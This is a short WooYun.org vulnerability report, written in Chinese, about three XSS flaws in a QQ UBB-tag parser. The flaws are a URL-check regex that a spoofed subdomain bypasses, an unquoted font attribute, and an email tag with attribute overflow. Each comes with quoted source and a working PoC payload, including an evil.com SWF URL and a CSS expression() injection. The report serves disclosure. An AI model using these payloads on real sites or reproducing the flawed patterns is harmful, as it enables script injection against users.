WooYun.org

1.
问题正则:
var isQQVideo=/^http:\/\/((\w+\.|)video|v).qq.com/i.test(url);
var isImgCache=/^http:\/\/(?:cnc.|edu.)?imgcache.qq.com/i.test(url);
var isComic=/^http:\/\/comic.qq.com/i.test(url);
var netWorking=isQQVideo | isImgCache | isComic ? "all" : "internal";
var fullScreen=isQQVideo ? "true" : "false";
var scriptaccess=isQQVideo | isImgCache | isComic ? "always" : "never";
URL匹配正则后面还缺个"/",不然可以用子域名欺骗绕过.
PoC:[flash,1,1]http://video.qq.com.evil.com/evil.swf[/flash]
2.
问题JS:
regstr=new RegExp("\\[ft=([^\\]]+)\\]", "g");
if (a=srcString.match(regstr)){
fontCount+=a.length;
srcString=srcString.replace(regstr, function (){
var s=arguments[1].split(",");
try{
if (s[0].length==7 && s[0].substring(1, 3)>="AA" && s[0].substring(3, 5)>="AA" && s[0].substring(5, 7)>="AA")
s[0]="#000000";
}catch (e){
}
var color=s[0] ? ' color='+s[0] : '';
var size=s[1] ? s[1] : null;
var face=s[2] ? ' face='+s[2] : '';
return'<font'+color+face+' style="'+(!size ? "" : ("font-size:"+fontSizeMap[size-1]))+'">'
});
}
color和face的值直接传入,没有过滤,输出时又没有用引号把值给限定住,一个空格就可以把值分割出一个属性名,并赋值.
PoC:[ft=eee style=ee:expression(alert(2));display:none;]4[/ft]
(IE下有效)
3.
问题JS:
if (/(all)|(email)/.test(replacewhat)){
regstr=new RegExp("\\[email\\](.*?)\\[\\/email\\]", "g");
srcString=srcString.replace(regstr, "<a href='mailto:$1' target='_blank'>$1</a><wbr>");
regstr=new RegExp("\\[email=(.*?)\\](.*?)\\[\\/email\\]", "g");
srcString=srcString.replace(regstr, "<a href='mailto:$2' target='_blank'>$1</a><wbr>");
}
没有对[email][/email]以及[email=foo][/email]两个UBB标签之间的参数进行过滤,直接输出.又由于输出的变量位于HTML的A标签的第一个属性值内,可以形成属性值的溢出,在标签中自定义属性以及属性值.
PoC:[email]1[email=2]3 style=display:none;[/email][/email]
(IE下有效)